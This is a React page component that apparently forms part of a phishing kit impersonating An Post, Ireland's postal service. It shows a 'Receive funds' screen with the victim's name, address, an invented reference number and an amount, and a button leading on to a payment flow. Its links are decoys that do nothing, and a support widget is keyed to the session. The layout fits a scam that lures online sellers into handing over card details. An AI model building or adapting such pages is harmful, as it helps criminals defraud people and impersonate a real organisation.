import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './AnPostIeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/an-post-ie-logo.svg`;

function noop(e) {
  e.preventDefault();
}

function descriptionRef(pageData, pageCode) {
  const pn = (pageData?.product_name || '').trim().replace(/\s+/g, '');
  if (/^\d+$/.test(pn)) return pn;
  const pc = pageCode || pageData?.page_code || '';
  if (!pc) return '—';
  let h = 0;
  for (let i = 0; i < pc.length; i += 1) h = (h * 33 + pc.charCodeAt(i)) >>> 0;
  return String(10000 + (h % 90000));
}

const FAQ_ITEMS = [
  {
    q: 'Can I track my parcel?',
    a: 'Yes — tracked services include a tracking number you can use on our website or app.',
  },
  {
    q: 'How do I correctly package my item?',
    a: 'Use a sturdy box, secure seams with tape, and ensure the label is visible and flat on the largest side.',
  },
  {
    q: 'What if I want to just use the postage calculator rather than purchase a tracked product?',
    a: 'You can use the calculator to estimate costs; buying a label online gives you the exact price and options.',
  },
  {
    q: 'How do I know what type of item I\'m posting?',
    a: 'Choose the category that best describes your contents; restrictions apply to prohibited items.',
  },
  {
    q: 'Why am I being asked for customs information?',
    a: 'International items require customs details for compliance and smooth delivery.',
  },
  {
    q: 'What customs information must I provide?',
    a: 'Typically contents description, value, and country of origin — follow the prompts when booking.',
  },
  {
    q: 'How do I find out the weight of my item?',
    a: 'Use kitchen or luggage scales; round up to the nearest available weight band when booking.',
  },
  {
    q: 'Where do I attach my label after I have printed it?',
    a: 'Attach it visibly on the largest flat surface, avoiding seams and edges where it may peel.',
  },
  {
    q: 'What do I do if I don\'t have a printer?',
    a: 'You can often use a QR code at a Post Office or partner location — check your booking confirmation.',
  },
  {
    q: 'Where can I drop off my parcels?',
    a: 'At Post Offices, parcel lockers, and selected PostPoint locations nationwide.',
  },
  {
    q: 'What if I am buying multiple labels?',
    a: 'Each label should be assigned to its corresponding parcel; keep references matched to avoid mix-ups.',
  },
  {
    q: 'What is my Basket Reference number?',
    a: 'It appears in your confirmation email and basket summary before payment.',
  },
  {
    q: 'Is my item insured?',
    a: 'Insurance depends on the service selected; review options at checkout.',
  },
  {
    q: 'How will Brexit affect my mail and parcels?',
    a: 'Customs rules may apply for GB; allow extra time and complete any required declarations.',
  },
  {
    q: 'What insurance options are available for sending an item within Ireland?',
    a: 'Domestic services may offer optional cover — see product details when you book.',
  },
  {
    q: 'What insurance options are available for sending an item internationally?',
    a: 'International products list optional cover limits; choose the level that suits your item.',
  },
  {
    q: 'Are there some items I cannot send?',
    a: 'Yes — prohibited and restricted items apply; see our guide before posting.',
  },
  {
    q: 'What are the benefits of registering for an account?',
    a: 'Faster checkout, saved addresses, and easier tracking of your shipments.',
  },
  {
    q: 'Are there any charges when I sign up?',
    a: 'Opening an account is free; you only pay for services you purchase.',
  },
];

function AnPostIeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [openFaq, setOpenFaq] = useState(null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'IE').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const amountStr =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)}`
      : '—';
  const amountWithSymbol =
    productPrice != null && Number.isFinite(productPrice) ? `${amountStr}${symbol}` : `—${symbol}`;

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const address = (pageData?.delivery_address || '').trim() || '—';

  const descDisplay = useMemo(
    () => descriptionRef(pageData, pageCode || pageData?.page_code || ''),
    [pageData, pageCode],
  );
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="ap-wrap">
        <div className="ap-loading">Loading…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="ap-wrap">
      <div className="ap-tier1">
        <div className="ap-tier1-inner">
          <div className="ap-tier1-left">
            <a href="#/" className="ap-active" onClick={noop}>Personal</a>
            <a href="#/" onClick={noop}>Business</a>
            <a href="#/" onClick={noop}>Money</a>
          </div>
          <div className="ap-tier1-right">
            <a href="#/" onClick={noop}>Sustainability</a>
            <a href="#/" onClick={noop}>Help &amp; Support</a>
            <a href="#/" onClick={noop}>Find a Post Office</a>
            <a href="#/" onClick={noop}>Shop</a>
            <a href="#/" onClick={noop}>My account ▾</a>
            <a href="#/" onClick={noop} aria-label="Search">🔍</a>
          </div>
        </div>
      </div>

      <div className="ap-tier2">
        <div className="ap-tier2-inner">
          <a href="#/" className="ap-brand" onClick={noop}>
            <img src={LOGO_SRC} alt="An Post" decoding="async" />
          </a>
          <nav className="ap-nav-main" aria-label="Primary">
            <a href="#/" className="ap-active" onClick={noop}>Post &amp; Parcels</a>
            <a href="#/" onClick={noop}>Money</a>
            <a href="#/" onClick={noop}>Mobile</a>
            <a href="#/" onClick={noop}>Insurance</a>
            <a href="#/" onClick={noop}>Government Services</a>
            <a href="#/" onClick={noop}>Shop</a>
          </nav>
        </div>
      </div>

      <main className="ap-main">
        <h1 className="ap-title">Receive funds</h1>
        <p className="ap-lead">
          This label can be printed, attached to your mail and dropped off at post offices, parcel lockers
          or selected PostPoint locations.
        </p>

        <div className="ap-grid">
          <div>
            <p className="ap-section-label">Recipient&apos;s personal information</p>
            <div className="ap-fake-row">
              <div className="ap-fake-field">{fn || '—'}</div>
              <div className="ap-fake-field">{ln || '—'}</div>
            </div>
            <div className="ap-fake-field ap-fake-field--full">{address}</div>

            <p className="ap-desc-label">Description</p>
            <div className="ap-fake-area">{descDisplay}</div>

            <Link to={index2Path} className="ap-cta">
              Receive funds ({amountWithSymbol})
            </Link>
          </div>

          <aside className="ap-card">
            <h3>Your express post with signature label to Ireland</h3>
            <dl className="ap-kv">
              <dt>Delivery Speed</dt>
              <dd>Next working day after sending</dd>
              <dt>Service</dt>
              <dd>Express Post with Signature</dd>
              <dt>Mail type</dt>
              <dd>parcel</dd>
              <dt>Weight</dt>
              <dd>0.1kg - 20kg</dd>
              <dt>Delivery cost</dt>
              <dd>Paid by the recipient</dd>
            </dl>
            <div className="ap-card-total">
              <span>Amount to be received</span>
              <span>{amountWithSymbol}</span>
            </div>
          </aside>
        </div>
      </main>

      <section className="ap-faq-wrap" aria-labelledby="ap-faq-heading">
        <p className="ap-faq-note">
          An Post will always endeavour to deliver within the timeframes provided, however please note that
          they are guided, and not guaranteed.
        </p>
        <h2 id="ap-faq-heading" className="ap-faq-title">
          Postage Calculator FAQs
        </h2>
        {FAQ_ITEMS.map((item, i) => (
          <div key={item.q} className="ap-acc-item">
            <button
              type="button"
              className="ap-acc-btn"
              aria-expanded={openFaq === i}
              onClick={() => setOpenFaq(openFaq === i ? null : i)}
            >
              <span>{item.q}</span>
              <span className="ap-acc-icon" aria-hidden>{openFaq === i ? '−' : '+'}</span>
            </button>
            {openFaq === i ? (
              <div className="ap-acc-panel">{item.a}</div>
            ) : null}
          </div>
        ))}
      </section>

      <footer className="ap-footer">
        <div className="ap-footer-inner">
          <ul className="ap-foot-links">
            <li><a href="#/" onClick={noop}>About An Post</a></li>
            <li><a href="#/" onClick={noop}>Working with An Post</a></li>
            <li><a href="#/" onClick={noop}>Media Centre</a></li>
            <li><a href="#/" onClick={noop}>Customer Charter</a></li>
            <li><a href="#/" onClick={noop}>An Post Irish Book Awards</a></li>
            <li><a href="#/" onClick={noop}>An Post Brand</a></li>
            <li><a href="#/" onClick={noop}>An Post Activities for Students</a></li>
            <li><a href="#/" onClick={noop}>GPO Witness History</a></li>
          </ul>
          <div className="ap-foot-right">
            <div className="ap-social">
              <span className="ap-soc" aria-hidden>f</span>
              <span className="ap-soc" aria-hidden>in</span>
              <span className="ap-soc" aria-hidden>𝕏</span>
              <span className="ap-soc" aria-hidden>▶</span>
              <span className="ap-soc" aria-hidden>◎</span>
            </div>
            <div className="ap-legal">
              <a href="#/" onClick={noop}>Security</a>
              {' | '}
              <a href="#/" onClick={noop}>Privacy</a>
              {' | '}
              <a href="#/" onClick={noop}>Terms of Use</a>
              {' | '}
              <a href="#/" onClick={noop}>Accessibility</a>
              {' | '}
              <a href="#/" onClick={noop}>Terms &amp; Conditions</a>
              {' | '}
              <a href="#/" onClick={noop}>Sitemap</a>
            </div>
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default AnPostIeSuccess;
